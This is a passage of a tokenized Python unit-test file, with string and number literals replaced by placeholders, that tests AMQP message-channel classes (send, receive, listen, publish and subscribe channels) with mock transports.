declare_exchange_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , transport . declare_exchange_impl . call_args [ <NUM_LIT:1> ] ) <EOL> @ patch ( '<STR_LIT>' , Mock ( ) ) <EOL> def test_close ( self ) : <EOL> transport = Mock ( ) <EOL> ch = BaseChannel ( ) <EOL> ch . on_channel_open ( transport ) <EOL> ch . _fsm . current_state = ch . S_ACTIVE <EOL> ch . close ( ) <EOL> transport . close . assert_called_once_with ( ) <EOL> def test_close_with_callback ( self ) : <EOL> cbmock = Mock ( ) <EOL> ch = BaseChannel ( close_callback = cbmock ) <EOL> ch . _fsm . current_state = ch . S_ACTIVE <EOL> ch . close ( ) <EOL> cbmock . assert_called_once_with ( ch ) <EOL> def test_on_channel_open ( self ) : <EOL> ch = BaseChannel ( ) <EOL> transport = Mock ( ) <EOL> ch . on_channel_open ( transport ) <EOL> transport . add_on_close_callback . assert_called_once_with ( ch . on_channel_close ) <EOL> self . assertEquals ( ch . _transport , transport ) <EOL> def test_on_channel_close ( self ) : <EOL> ch = BaseChannel ( ) <EOL> ch . on_channel_open ( Mock ( ) ) <EOL> ch . _transport . channel_number = <NUM_LIT:1> <EOL> ch . on_channel_close ( ch , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> self . assertIsNone ( ch . _transport ) <EOL> def test_on_channel_closed_with_error_callback ( self ) : <EOL> ch = BaseChannel ( ) <EOL> ch . on_channel_open ( Mock ( ) ) <EOL> ch . _transport . channel_number = <NUM_LIT:1> <EOL> closemock = Mock ( ) <EOL> ch . set_closed_error_callback ( closemock ) <EOL> ch . on_channel_close ( ch , <NUM_LIT:1> , '<STR_LIT>' ) <EOL> closemock . assert_called_once_with ( ch , <NUM_LIT:1> , '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_on_channel_close_with_error_in_error_callback ( self , logmock ) : <EOL> ch = BaseChannel ( ) <EOL> ch . on_channel_open ( Mock ( ) ) <EOL> ch . _transport . channel_number = <NUM_LIT:1> <EOL> closemock = Mock ( ) <EOL> closemock . side_effect = StandardError <EOL> ch . set_closed_error_callback ( closemock ) <EOL> ch . on_channel_close ( ch , <NUM_LIT:1> , '<STR_LIT>' ) <EOL> self . assertEquals ( logmock . warn . call_count , <NUM_LIT:1> ) <EOL> def test_get_channel_id ( self ) : <EOL> ch = BaseChannel ( ) <EOL> self . assertTrue ( ch . get_channel_id ( ) is None ) <EOL> ch . on_channel_open ( Mock ( ) ) <EOL> self . assertEquals ( ch . get_channel_id ( ) , ch . _transport . channel_number ) <EOL> def test__ensure_transport ( self ) : <EOL> ch = BaseChannel ( ) <EOL> with self . assertRaises ( ChannelError ) : <EOL> with ch . _ensure_transport ( ) : <EOL> pass <EOL> @ attr ( '<STR_LIT>' ) <EOL> class TestSendChannel ( PyonTestCase ) : <EOL> def setUp ( self ) : <EOL> self . ch = SendChannel ( ) <EOL> def test_connect ( self ) : <EOL> self . ch . connect ( NameTrio ( '<STR_LIT>' , '<STR_LIT:key>' ) ) <EOL> self . assertTrue ( hasattr ( self . ch . _send_name , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( self . ch . _send_name , '<STR_LIT>' ) ) <EOL> self . assertEquals ( self . ch . _send_name . exchange , '<STR_LIT>' ) <EOL> self . assertEquals ( self . ch . _send_name . queue , '<STR_LIT:key>' ) <EOL> self . assertEquals ( self . ch . _exchange , '<STR_LIT>' ) <EOL> def test_send ( self ) : <EOL> _sendmock = Mock ( ) <EOL> self . ch . _send = _sendmock <EOL> np = NameTrio ( '<STR_LIT>' , '<STR_LIT:key>' ) <EOL> self . ch . connect ( np ) <EOL> self . ch . send ( '<STR_LIT:data>' , { '<STR_LIT>' : sentinel . headervalue } ) <EOL> _sendmock . assert_called_once_with ( np , '<STR_LIT:data>' , headers = { '<STR_LIT>' : sentinel . headervalue } ) <EOL> def test__send ( self ) : <EOL> transport = Mock ( ) <EOL> transport . channel_number = sentinel . channel_number <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . _send ( NameTrio ( '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertTrue ( transport . publish_impl . called ) <EOL> self . assertIn ( '<STR_LIT>' , transport . publish_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , transport . publish_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT:body>' , transport . publish_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , transport . publish_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , transport . publish_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , transport . publish_impl . call_args [ <NUM_LIT:1> ] ) <EOL> props = transport . publish_impl . call_args [ <NUM_LIT:1> ] . get ( '<STR_LIT>' ) <EOL> self . assertEquals ( props , { } ) <EOL> self . ch . _send ( NameTrio ( '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' , headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> props = transport . publish_impl . call_args [ <NUM_LIT:1> ] . get ( '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , props ) <EOL> self . assertEquals ( props [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> @ attr ( '<STR_LIT>' ) <EOL> class TestRecvChannel ( PyonTestCase ) : <EOL> def setUp ( self ) : <EOL> self . ch = RecvChannel ( ) <EOL> def _create_channel ( self ) : <EOL> """<STR_LIT>""" <EOL> ch = RecvChannel ( ) <EOL> ch . _declare_exchange = Mock ( ) <EOL> ch . _declare_queue = Mock ( ) <EOL> ch . _declare_queue . return_value = sentinel . anon_queue <EOL> ch . _bind = Mock ( ) <EOL> return ch <EOL> def test_setup_listener ( self ) : <EOL> mxp = Mock ( ) <EOL> mdq = Mock ( ) <EOL> mdq . return_value = sentinel . anon_queue <EOL> mb = Mock ( ) <EOL> def create_channel ( ) : <EOL> ch = RecvChannel ( ) <EOL> ch . _declare_exchange = mxp <EOL> ch . _declare_queue = mdq <EOL> ch . _bind = mb <EOL> return ch <EOL> ch = create_channel ( ) <EOL> self . assertFalse ( ch . _setup_listener_called ) <EOL> ch . setup_listener ( NameTrio ( sentinel . xp , sentinel . queue , sentinel . binding ) ) <EOL> self . assertTrue ( hasattr ( ch , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( ch . _recv_name , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( ch . _recv_name , '<STR_LIT>' ) ) <EOL> self . assertEquals ( ch . _recv_name . exchange , sentinel . xp ) <EOL> self . assertEquals ( ch . _recv_name . queue , sentinel . queue ) <EOL> mxp . assert_called_once_with ( sentinel . xp ) <EOL> mdq . assert_called_once_with ( sentinel . queue ) <EOL> mb . assert_called_once_with ( sentinel . binding ) <EOL> self . assertTrue ( ch . _setup_listener_called ) <EOL> ch . setup_listener ( NameTrio ( sentinel . xp2 , sentinel . queue2 ) ) <EOL> self . assertTrue ( hasattr ( ch . _recv_name , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( ch . _recv_name , '<STR_LIT>' ) ) <EOL> self . assertEquals ( ch . _recv_name . exchange , sentinel . xp ) <EOL> self . assertEquals ( ch . _recv_name . queue , sentinel . queue ) <EOL> mxp . assert_called_once_with ( sentinel . xp ) <EOL> mdq . assert_called_once_with ( sentinel . queue ) <EOL> mb . assert_called_once_with ( sentinel . binding ) <EOL> ch = create_channel ( ) <EOL> ch . setup_listener ( NameTrio ( sentinel . xp2 , sentinel . queue2 ) , binding = sentinel . binding ) <EOL> mxp . assert_called_with ( sentinel . xp2 ) <EOL> mdq . assert_called_with ( sentinel . queue2 ) <EOL> mb . assert_called_with ( sentinel . binding ) <EOL> ch = create_channel ( ) <EOL> ch . setup_listener ( NameTrio ( sentinel . xp3 ) ) <EOL> mxp . assert_called_with ( sentinel . xp3 ) <EOL> mdq . assert_called_with ( None ) <EOL> mb . assert_called_with ( sentinel . anon_queue ) <EOL> ch = create_channel ( ) <EOL> ch . setup_listener ( NameTrio ( sentinel . xp4 ) , binding = sentinel . binding2 ) <EOL> mxp . assert_called_with ( sentinel . xp4 ) <EOL> mdq . assert_called_with ( None ) <EOL> mb . assert_called_with ( sentinel . binding2 ) <EOL> def test_setup_listener_existing_recv_name ( self ) : <EOL> ch = self . _create_channel ( ) <EOL> recv_name = NameTrio ( sentinel . xp , sentinel . queue , sentinel . binding ) <EOL> ch . _recv_name = recv_name <EOL> ch . setup_listener ( ) <EOL> self . assertEquals ( ch . _recv_name , recv_name ) <EOL> def test_setup_listener_existing_recv_name_with_differing_name ( self ) : <EOL> ch = self . _create_channel ( ) <EOL> recv_name = NameTrio ( sentinel . xp , sentinel . queue , sentinel . binding ) <EOL> ch . _recv_name = recv_name <EOL> ch . setup_listener ( name = NameTrio ( sentinel . xp , sentinel . queue , sentinel . notbinding ) ) <EOL> self . assertNotEquals ( ch . _recv_name , recv_name ) <EOL> self . assertEquals ( ch . _recv_name . exchange , sentinel . xp ) <EOL> self . assertEquals ( ch . _recv_name . queue , sentinel . queue ) <EOL> self . assertEquals ( ch . _recv_name . binding , sentinel . notbinding ) <EOL> def test__destroy_queue_no_recv_name ( self ) : <EOL> self . assertRaises ( AssertionError , self . ch . destroy_listener ) <EOL> def test__destroy_queue ( self ) : <EOL> self . ch . _recv_name = NameTrio ( sentinel . xp , sentinel . queue ) <EOL> self . ch . on_channel_open ( Mock ( BaseTransport ) ) <EOL> self . ch . destroy_listener ( ) <EOL> self . assertTrue ( self . ch . _transport . delete_queue_impl . called ) <EOL> self . assertIn ( '<STR_LIT>' , self . ch . _transport . delete_queue_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( sentinel . queue , self . ch . _transport . delete_queue_impl . call_args [ <NUM_LIT:1> ] . itervalues ( ) ) <EOL> def test_destroy_listener ( self ) : <EOL> m = Mock ( ) <EOL> self . ch . _destroy_queue = m <EOL> self . ch . destroy_listener ( ) <EOL> m . assert_called_once_with ( ) <EOL> def test__destroy_binding_no_recv_name_or_binding ( self ) : <EOL> self . assertRaises ( AssertionError , self . ch . _destroy_binding ) <EOL> def test__destroy_binding ( self ) : <EOL> self . ch . _recv_name = NameTrio ( sentinel . xp , sentinel . queue ) <EOL> self . ch . _recv_binding = sentinel . binding <EOL> self . ch . on_channel_open ( Mock ( BaseTransport ) ) <EOL> self . ch . _destroy_binding ( ) <EOL> self . assertTrue ( self . ch . _transport . unbind_impl . called ) <EOL> self . assertIn ( '<STR_LIT>' , self . ch . _transport . unbind_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , self . ch . _transport . unbind_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , self . ch . _transport . unbind_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( sentinel . queue , self . ch . _transport . unbind_impl . call_args [ <NUM_LIT:1> ] . itervalues ( ) ) <EOL> self . assertIn ( sentinel . xp , self . ch . _transport . unbind_impl . call_args [ <NUM_LIT:1> ] . itervalues ( ) ) <EOL> self . assertIn ( sentinel . binding , self . ch . _transport . unbind_impl . call_args [ <NUM_LIT:1> ] . itervalues ( ) ) <EOL> def test_start_consume ( self ) : <EOL> transport = MagicMock ( ) <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . _fsm . current_state = self . ch . S_ACTIVE <EOL> transport . start_consume_impl . return_value = sentinel . consumer_tag <EOL> self . ch . _recv_name = NameTrio ( sentinel . xp , sentinel . queue ) <EOL> self . ch . start_consume ( ) <EOL> self . assertTrue ( self . ch . _consuming ) <EOL> self . assertEquals ( self . ch . _fsm . current_state , self . ch . S_ACTIVE ) <EOL> self . assertEquals ( self . ch . _consumer_tag , sentinel . consumer_tag ) <EOL> transport . start_consume_impl . assert_called_once_with ( self . ch . _on_deliver , queue = sentinel . queue , no_ack = self . ch . _consumer_no_ack , exclusive = self . ch . _consumer_exclusive ) <EOL> def test_start_consume_already_started ( self ) : <EOL> self . ch . _on_start_consume = Mock ( ) <EOL> self . ch . _consuming = True <EOL> self . ch . start_consume ( ) <EOL> self . assertFalse ( self . ch . _on_start_consume . called ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_start_consume_with_consumer_tag_and_auto_delete ( self , mocklog ) : <EOL> transport = AMQPTransport ( Mock ( ) ) <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . _fsm . current_state = self . ch . S_ACTIVE <EOL> self . ch . _recv_name = NameTrio ( sentinel . xp , sentinel . queue ) <EOL> self . ch . _consumer_tag = sentinel . consumer_tag <EOL> self . ch . _queue_auto_delete = True <EOL> self . ch . start_consume ( ) <EOL> self . assertTrue ( mocklog . warn . called ) <EOL> def test_stop_consume ( self ) : <EOL> transport = MagicMock ( ) <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . _fsm . current_state = self . ch . S_ACTIVE <EOL> self . ch . _consuming = True <EOL> self . ch . _consumer_tag = sentinel . consumer_tag <EOL> self . ch . stop_consume ( ) <EOL> self . assertEquals ( self . ch . _fsm . current_state , self . ch . S_ACTIVE ) <EOL> self . assertFalse ( self . ch . _consuming ) <EOL> self . assertTrue ( transport . stop_consume_impl . called ) <EOL> self . assertIn ( sentinel . consumer_tag , transport . stop_consume_impl . call_args [ <NUM_LIT:0> ] ) <EOL> def test_stop_consume_havent_started ( self ) : <EOL> self . ch . _on_stop_consume = Mock ( ) <EOL> self . ch . stop_consume ( ) <EOL> self . assertFalse ( self . ch . _on_stop_consume . called ) <EOL> def test_stop_consume_raises_warning_with_auto_delete ( self ) : <EOL> transport = AMQPTransport ( Mock ( ) ) <EOL> transport . stop_consume_impl = Mock ( ) <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . _consumer_tag = sentinel . consumer_tag <EOL> self . ch . _recv_name = NameTrio ( sentinel . ex , sentinel . queue , sentinel . binding ) <EOL> self . ch . _fsm . current_state = self . ch . S_ACTIVE <EOL> self . ch . _consuming = True <EOL> self . ch . _queue_auto_delete = True <EOL> self . ch . stop_consume ( ) <EOL> self . assertTrue ( self . ch . _transport . stop_consume_impl . called ) <EOL> self . assertIn ( self . ch . _consumer_tag , self . ch . _transport . stop_consume_impl . call_args [ <NUM_LIT:0> ] ) <EOL> def test_recv ( self ) : <EOL> rqmock = Mock ( spec = RecvChannel . SizeNotifyQueue ) <EOL> self . ch . _recv_queue = rqmock <EOL> rqmock . get . return_value = sentinel . recv <EOL> m = self . ch . recv ( ) <EOL> self . assertEquals ( m , sentinel . recv ) <EOL> self . assertTrue ( rqmock . get . called ) <EOL> def test_recv_shutdown ( self ) : <EOL> rqmock = Mock ( spec = RecvChannel . SizeNotifyQueue ) <EOL> self . ch . _recv_queue = rqmock <EOL> rqmock . get . return_value = ChannelShutdownMessage ( ) <EOL> self . assertRaises ( ChannelClosedError , self . ch . recv ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' , Mock ( ) ) <EOL> def test_close_impl ( self , mockshutdown , mockbasechannel ) : <EOL> mockrq = Mock ( spec = RecvChannel . SizeNotifyQueue ) <EOL> self . ch . _recv_queue = mockrq <EOL> self . ch . close_impl ( ) <EOL> mockshutdown . assert_called_once_with ( ) <EOL> mockrq . put . assert_called_once_with ( mockshutdown ( ) ) <EOL> mockbasechannel . close_impl . assert_called_once_with ( self . ch ) <EOL> def test_declare_queue ( self ) : <EOL> self . ch . on_channel_open ( Mock ( BaseTransport ) ) <EOL> self . ch . _recv_name = ( NameTrio ( str ( sentinel . xp ) ) ) <EOL> qd = self . ch . _declare_queue ( str ( sentinel . queue ) ) <EOL> self . assertTrue ( self . ch . _transport . declare_queue_impl . called ) <EOL> self . assertIn ( '<STR_LIT>' , self . ch . _transport . declare_queue_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , self . ch . _transport . declare_queue_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , self . ch . _transport . declare_queue_impl . call_args [ <NUM_LIT:1> ] ) <EOL> composed = "<STR_LIT:.>" . join ( [ str ( sentinel . xp ) , str ( sentinel . queue ) ] ) <EOL> self . assertIn ( composed , self . ch . _transport . declare_queue_impl . call_args [ <NUM_LIT:1> ] . itervalues ( ) ) <EOL> self . assertIn ( self . ch . queue_auto_delete , self . ch . _transport . declare_queue_impl . call_args [ <NUM_LIT:1> ] . itervalues ( ) ) <EOL> self . assertIn ( self . ch . queue_durable , self . ch . _transport . declare_queue_impl . call_args [ <NUM_LIT:1> ] . itervalues ( ) ) <EOL> self . assertTrue ( hasattr ( self . ch . _recv_name , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( self . ch . _recv_name , '<STR_LIT>' ) ) <EOL> self . assertEquals ( self . ch . _recv_name . exchange , str ( sentinel . xp ) ) <EOL> self . assertEquals ( self . ch . _recv_name . queue , self . ch . _transport . declare_queue_impl ( ) ) <EOL> self . assertEquals ( qd , self . ch . _transport . declare_queue_impl ( ) ) <EOL> def test__bind_no_name ( self ) : <EOL> self . assertRaises ( AssertionError , self . ch . _bind , sentinel . binding ) <EOL> def test__bind ( self ) : <EOL> self . ch . _recv_name = NameTrio ( sentinel . xp , sentinel . queue ) <EOL> self . ch . on_channel_open ( Mock ( ) ) <EOL> self . ch . _bind ( sentinel . binding ) <EOL> self . assertTrue ( self . ch . _transport . bind_impl . called ) <EOL> self . assertIn ( '<STR_LIT>' , self . ch . _transport . bind_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , self . ch . _transport . bind_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , self . ch . _transport . bind_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( sentinel . queue , self . ch . _transport . bind_impl . call_args [ <NUM_LIT:1> ] . itervalues ( ) ) <EOL> self . assertIn ( sentinel . xp , self . ch . _transport . bind_impl . call_args [ <NUM_LIT:1> ] . itervalues ( ) ) <EOL> self . assertIn ( sentinel . binding , self . ch . _transport . bind_impl . call_args [ <NUM_LIT:1> ] . itervalues ( ) ) <EOL> def test__on_deliver ( self ) : <EOL> m = Mock ( ) <EOL> m . consumer_tag = sentinel . consumer_tag <EOL> m . delivery_tag = sentinel . delivery_tag <EOL> m . redelivered = sentinel . redelivered <EOL> m . exchange = sentinel . exchange <EOL> m . routing_key = sentinel . routing_key <EOL> h = Mock ( ) <EOL> h . headers = { '<STR_LIT>' : sentinel . exists } <EOL> rqmock = Mock ( spec = RecvChannel . SizeNotifyQueue ) <EOL> self . ch . _recv_queue = rqmock <EOL> self . ch . _on_deliver ( sentinel . chan , m , h , sentinel . body ) <EOL> rqmock . put . assert_called_once_with ( ( sentinel . body , h . headers , sentinel . delivery_tag ) ) <EOL> self . assertIn ( sentinel . exists , rqmock . put . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] . itervalues ( ) ) <EOL> def test_ack ( self ) : <EOL> transport = Mock ( ) <EOL> transport . channel_number = sentinel . channel_number <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . ack ( sentinel . delivery_tag ) <EOL> transport . ack_impl . assert_called_once_with ( sentinel . delivery_tag ) <EOL> def test_reject ( self ) : <EOL> transport = Mock ( ) <EOL> transport . channel_number = sentinel . channel_number <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . reject ( sentinel . delivery_tag , requeue = True ) <EOL> transport . reject_impl . assert_called_once_with ( sentinel . delivery_tag , requeue = True ) <EOL> def test_reset ( self ) : <EOL> self . ch . reset ( ) <EOL> self . assertEquals ( self . ch . _fsm . current_state , self . ch . S_INIT ) <EOL> def test_reset_when_consuming ( self ) : <EOL> transport = MagicMock ( ) <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . _fsm . current_state = self . ch . S_ACTIVE <EOL> self . ch . _consuming = True <EOL> self . ch . _consumer_tag = sentinel . consumer_tag <EOL> self . ch . reset ( ) <EOL> self . assertEquals ( self . ch . _fsm . current_state , self . ch . S_ACTIVE ) <EOL> self . assertTrue ( transport . stop_consume_impl . called ) <EOL> def test_get_stats ( self ) : <EOL> transport = Mock ( ) <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . _recv_name = NameTrio ( sentinel . ex , sentinel . queue ) <EOL> self . ch . get_stats ( ) <EOL> self . ch . _transport . get_stats_impl . assert_called_once_with ( queue = sentinel . queue ) <EOL> def test_purge ( self ) : <EOL> transport = Mock ( ) <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . _recv_name = NameTrio ( sentinel . ex , sentinel . queue ) <EOL> self . ch . _purge ( ) <EOL> self . ch . _transport . purge_impl . assert_called_once_with ( queue = sentinel . queue ) <EOL> @ attr ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> class TestPublisherChannel ( PyonTestCase ) : <EOL> def test_verify_service ( self , mocksendchannel ) : <EOL> PyonTestCase . test_verify_service ( self ) <EOL> def test_init ( self , mocksendchannel ) : <EOL> pubchan = PublisherChannel ( ) <EOL> def test_send_no_name ( self , mocksendchannel ) : <EOL> pubchan = PublisherChannel ( ) <EOL> self . assertRaises ( AssertionError , pubchan . send , sentinel . data ) <EOL> def test_send ( self , mocksendchannel ) : <EOL> depmock = Mock ( ) <EOL> pubchan = PublisherChannel ( ) <EOL> pubchan . _declare_exchange = depmock <EOL> pubchan . _send_name = NameTrio ( sentinel . xp , sentinel . routing_key ) <EOL> pubchan . send ( sentinel . data ) <EOL> depmock . assert_called_once_with ( sentinel . xp ) <EOL> mocksendchannel . send . assert_called_once_with ( pubchan , sentinel . data , headers = None ) <EOL> @ attr ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> class TestBidirClientChannel ( PyonTestCase ) : <EOL> def test_verify_service ( self , mocksendchannel ) : <EOL> PyonTestCase . test_verify_service ( self ) <EOL> def setUp ( self ) : <EOL> self . ch = BidirClientChannel ( ) <EOL> def test__send_with_reply_to ( self , mocksendchannel ) : <EOL> self . ch . _recv_name = NameTrio ( sentinel . xp , sentinel . queue ) <EOL> self . ch . _send ( sentinel . name , sentinel . data , headers = { sentinel . header_key : sentinel . header_value } ) <EOL> mocksendchannel . _send . assert_called_with ( self . ch , <EOL> sentinel . name , <EOL> sentinel . data , <EOL> headers = { sentinel . header_key : sentinel . header_value , '<STR_LIT>' : '<STR_LIT>' % ( sentinel . xp , sentinel . queue ) } ) <EOL> def test__send_with_no_reply_to ( self , mocksendchannel ) : <EOL> self . ch . _recv_name = NameTrio ( sentinel . xp , sentinel . queue ) <EOL> self . ch . _send ( sentinel . name , sentinel . data ) <EOL> mocksendchannel . _send . assert_called_with ( self . ch , sentinel . name , sentinel . data , headers = { '<STR_LIT>' : "<STR_LIT>" % ( sentinel . xp , sentinel . queue ) } ) <EOL> @ attr ( '<STR_LIT>' ) <EOL> class TestListenChannel ( PyonTestCase ) : <EOL> def setUp ( self ) : <EOL> self . ch = ListenChannel ( ) <EOL> def test__create_accepted_channel ( self ) : <EOL> newch = self . ch . _create_accepted_channel ( sentinel . transport , sentinel . msg ) <EOL> self . assertIsInstance ( newch , ListenChannel . AcceptedListenChannel ) <EOL> self . assertEquals ( newch . _transport , sentinel . transport ) <EOL> def test_accept ( self ) : <EOL> rmock = Mock ( ) <EOL> rmock . return_value = sentinel . msg <EOL> cacmock = Mock ( ) <EOL> transport = Mock ( ) <EOL> self . ch . recv = rmock <EOL> self . ch . _recv_queue . await_n = MagicMock ( ) <EOL> self . ch . _create_accepted_channel = cacmock <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . _fsm . current_state = self . ch . S_ACTIVE <EOL> self . ch . _consuming = True <EOL> retch = self . ch . accept ( ) <EOL> self . assertEquals ( self . ch . _fsm . current_state , self . ch . S_ACCEPTED ) <EOL> cacmock . assert_called_once_with ( transport , [ sentinel . msg ] ) <EOL> retch . _recv_queue . put . assert_called_once_with ( sentinel . msg ) <EOL> self . ch . exit_accept ( ) <EOL> self . assertEquals ( self . ch . _fsm . current_state , self . ch . S_ACTIVE ) <EOL> self . assertTrue ( self . ch . _consuming ) <EOL> def test_close_while_accepted ( self ) : <EOL> rmock = Mock ( ) <EOL> rmock . return_value = sentinel . msg <EOL> cacmock = Mock ( ) <EOL> transport = Mock ( ) <EOL> self . ch . recv = rmock <EOL> self . ch . _recv_queue . await_n = MagicMock ( ) <EOL> self . ch . _create_accepted_channel = cacmock <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . _fsm . current_state = self . ch . S_ACTIVE <EOL> self . ch . _consuming = True <EOL> self . ch . close_impl = Mock ( ) <EOL> self . ch . _on_stop_consume = Mock ( ) <EOL> retch = self . ch . accept ( ) <EOL> self . assertEquals ( self . ch . _fsm . current_state , self . ch . S_ACCEPTED ) <EOL> self . ch . close ( ) <EOL> self . assertFalse ( self . ch . close_impl . called ) <EOL> self . assertFalse ( self . ch . _on_stop_consume . called ) <EOL> self . assertEquals ( self . ch . _fsm . current_state , self . ch . S_CLOSING ) <EOL> self . ch . exit_accept ( ) <EOL> self . assertTrue ( self . ch . close_impl . called ) <EOL> self . assertTrue ( self . ch . _on_stop_consume . called ) <EOL> self . assertEquals ( self . ch . _fsm . current_state , self . ch . S_CLOSED ) <EOL> self . assertFalse ( self . ch . _consuming ) <EOL> def test_stop_consume_while_accepted ( self ) : <EOL> rmock = Mock ( ) <EOL> rmock . return_value = sentinel . msg <EOL> cacmock = Mock ( ) <EOL> transport = Mock ( ) <EOL> self . ch . recv = rmock <EOL> self . ch . _recv_queue . await_n = MagicMock ( ) <EOL> self . ch . _create_accepted_channel = cacmock <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . _fsm . current_state = self . ch . S_ACTIVE <EOL> self . ch . _consuming = True <EOL> self . ch . _on_stop_consume = Mock ( ) <EOL> retch = self . ch . accept ( ) <EOL> self . assertEquals ( self . ch . _fsm . current_state , self . ch . S_ACCEPTED ) <EOL> self . ch . stop_consume ( ) <EOL> self . assertFalse ( self . ch . _consuming ) <EOL> self . assertTrue ( self . ch . _on_stop_consume . called ) <EOL> self . assertEquals ( self . ch . _fsm . current_state , self . ch . S_ACCEPTED ) <EOL> self . ch . exit_accept ( ) <EOL> self . assertEquals ( self . ch . _fsm . current_state , self . ch . S_ACTIVE ) <EOL> def test_AcceptedListenChannel_close_does_not_close_underlying_amqp_channel ( self ) : <EOL> transport = Mock ( ) <EOL> newch = self . ch . _create_accepted_channel ( transport , sentinel . msg ) <EOL> newch . close ( ) <EOL> self . assertEquals ( transport . close . call_count , <NUM_LIT:0> ) <EOL> @ attr ( '<STR_LIT>' ) <EOL> class TestSubscriberChannel ( PyonTestCase ) : <EOL> def test_close_does_delete_if_anonymous_and_not_auto_delete ( self ) : <EOL> transport = AMQPTransport ( Mock ( ) ) <EOL> ch = SubscriberChannel ( ) <EOL> ch . on_channel_open ( transport ) <EOL> ch . _queue_auto_delete = False <EOL> ch . _destroy_queue = Mock ( ) <EOL> ch . _recv_name = NameTrio ( sentinel . exchange , '<STR_LIT>' ) <EOL> ch . close_impl ( ) <EOL> ch . _destroy_queue . assert_called_once_with ( ) <EOL> def test_close_does_not_delete_if_named ( self ) : <EOL> ch = SubscriberChannel ( ) <EOL> ch . _queue_auto_delete = False <EOL> ch . _destroy_queue = Mock ( ) <EOL> ch . _recv_name = NameTrio ( sentinel . exchange , '<STR_LIT>' ) <EOL> ch . close_impl ( ) <EOL> self . assertFalse ( ch . _destroy_queue . called ) <EOL> def test_close_does_not_delete_if_anon_but_auto_delete ( self ) : <EOL> ch = SubscriberChannel ( ) <EOL> ch . _queue_auto_delete = True <EOL> ch . _destroy_queue = Mock ( ) <EOL> ch . _recv_name = NameTrio ( sentinel . exchange , '<STR_LIT>' ) <EOL> ch . close_impl ( ) <EOL> self . assertFalse ( ch . _destroy_queue . called ) <EOL> @ attr ( '<STR_LIT>' ) <EOL> class TestServerChannel ( PyonTestCase ) : <EOL> def test__create_accepted_channel ( self ) : <EOL> ch = ServerChannel ( ) <EOL> msg = [ [ None , { '<STR_LIT>' : '<STR_LIT>' } ] ] <EOL> newch = ch . _create_accepted_channel ( sentinel . transport , msg ) <EOL> self . assertIsInstance ( newch , ServerChannel . BidirAcceptChannel ) <EOL> self . assertEquals ( newch . _transport , sentinel . transport ) <EOL> self . assertTrue ( hasattr ( newch . _send_name , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( newch . _send_name , '<STR_LIT>' ) ) <EOL> self . assertEquals ( newch . _send_name . exchange , '<STR_LIT>' ) <EOL> self . assertEquals ( newch . _send_name . queue , '<STR_LIT>' ) <EOL> @ attr ( '<STR_LIT>' ) <EOL> class TestChannelInt ( IonIntegrationTestCase ) : <EOL> def setUp ( self ) : <EOL> self . patch_cfg ( '<STR_LIT>' , { '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : None } } , <EOL> '<STR_LIT>' : CFG [ '<STR_LIT>' ] [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : CFG [ '<STR_LIT>' ] } ) <EOL> self . _start_container ( ) <EOL> def test_consume_one_message_at_a_time ( self ) : <EOL> def every_five ( ) : <EOL> p = self . container . node . channel ( PublisherChannel ) <EOL> p . _send_name = NameTrio ( bootstrap . get_sys_name ( ) , '<STR_LIT>' ) <EOL> counter = <NUM_LIT:0> <EOL> while not self . publish_five . wait ( timeout = 